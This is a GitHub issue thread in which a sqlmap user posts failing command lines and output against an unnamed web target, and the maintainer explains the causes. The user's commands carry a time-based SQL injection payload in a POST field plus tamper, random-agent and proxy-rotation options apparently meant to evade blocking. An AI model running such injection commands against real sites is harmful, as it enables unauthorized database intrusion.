### ISSUE TITLE
Do you have an idea for a solution?

### ISSUE THREAD

**Issue by shade2004474** [sqlmapproject/sqlmap#2600]
--risk=3 --level=5 --technique=BU --tamper="space2mysqlblank.py" --random-agent --dbs --no-cast --proxy-file=proxy.txt
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.5.17#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:23:18

[09:23:18] [CRITICAL] unable to read file 'proxy.txt'

[*] shutting down at 09:23:18

[root@vps1377104923 sqlmap-master]# python sqlmap.py -u " url" --data="submit=SUBMIT&campaign=888&fromdate=2017-06-02&grp1=user&hour1=0&hour2=0&min1=0&min2=0&todate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/" --risk=3 --level=5  --dbs --keep-alive
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.5.17#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:24:27

custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[09:24:30] [INFO] testing connection to the target URL
[09:25:15] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[09:25:15] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[09:25:15] [WARNING] if the problem persists please check that the provided target URL is valid. In case that it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches ('--ignore-proxy', '--proxy',...)
[09:26:50] [CRITICAL] connection timed out to the target URL

[*] shutting down at 09:26:50

**Comment by shade2004474** [comment]
-v3 --dbms="MySql" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent --dbs --no-cast

I've used most commands to solve it

**Comment by stamparm** [comment]
So, basically, you have multitude of "problems":

1) In first run you are missing file `proxy.txt`. In further runs try to provide an absolute path to it
2) You are providing already injected parameter value (`todate=(select(0)from(select(sleep(0)))v)/'%...`) while you are being warned by sqlmap in such occasions to ONLY use valid parameter values (without SQLi inside)
3) Your target is most probably immediately blocking your requests as it can be seen that you are having trouble connecting it in the first place (`... connection timed out to the target URL...`)
